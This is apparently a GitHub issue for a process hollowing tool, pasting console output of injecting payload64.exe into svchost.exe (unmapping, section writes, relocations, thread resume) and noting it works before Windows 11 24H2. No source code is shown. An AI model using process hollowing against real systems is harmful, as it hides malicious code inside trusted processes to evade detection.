-
Notifications
You must be signed in to change notification settings - Fork 2
Open
Description
C:\test>"Process Hollowing x64.exe" c:\windows\system32\svchost.exe payload64.exe
Creating Susspended Process. [c:\windows\system32\svchost.exe]
Mamming File To Memory. [payload64.exe]
Geting Current Context.
Unmapping Section.
Original Process Base: 0x140000000
Evil File Base: 0x7ff64cdc0000
Offset: 0x7ff50cdc0000
Writing Sections:
0x4cdc1000 -- Writing Section: .text
0x4cdd1000 -- Writing Section: .rdata
0x4cdd9000 -- Writing Section: .data
0x4cddd000 -- Writing Section: .pdata
0x4cdde000 -- Writing Section: .rsrc
0x4cddf000 -- Writing Section: .reloc
Relocating The Relocation Table...
Relocation Block 0x11000. Size: 0x54
38 Entries Must Be Realocated In The Current Block.
0x140001018 --> 0x7ff64cdc1018 | At:0x7ff64cdd1260
0x140001000 --> 0x7ff64cdc1000 | At:0x7ff64cdd1268
0x14000205c --> 0x7ff64cdc205c | At:0x7ff64cdd1280
0x140006bd4 --> 0x7ff64cdc6bd4 | At:0x7ff64cdd1288
0x14000760c --> 0x7ff64cdc760c | At:0x7ff64cdd1290
0x140007ff8 --> 0x7ff64cdc7ff8 | At:0x7ff64cdd1298
0x1400052bc --> 0x7ff64cdc52bc | At:0x7ff64cdd12a0
......
0x140016864 --> 0x7ff64cdd6864 | At:0x7ff64cdda298
0x1400113d0 --> 0x7ff64cdd13d0 | At:0x7ff64cdda5c0
0x1400113d0 --> 0x7ff64cdd13d0 | At:0x7ff64cdda5e0
0x1400113d0 --> 0x7ff64cdd13d0 | At:0x7ff64cdda608
0x1400113d0 --> 0x7ff64cdd13d0 | At:0x7ff64cdda630
0x1400113d0 --> 0x7ff64cdd13d0 | At:0x7ff64cdda658
0x1400113d0 --> 0x7ff64cdd13d0 | At:0x7ff64cdda680
0x1400113d0 --> 0x7ff64cdd13d0 | At:0x7ff64cdda6a8
0x1400113d0 --> 0x7ff64cdd13d0 | At:0x7ff64cdda6d0
The Type Of Base Relocation Is 0. Skipping.
Setting Thread Context.
Resuming Thread.
Done. Enjoy The "New" Process.
---------------------------------
It's ok on before windows 11 24H2
Reactions are currently unavailable
Metadata
Metadata
Assignees
Labels
No labels
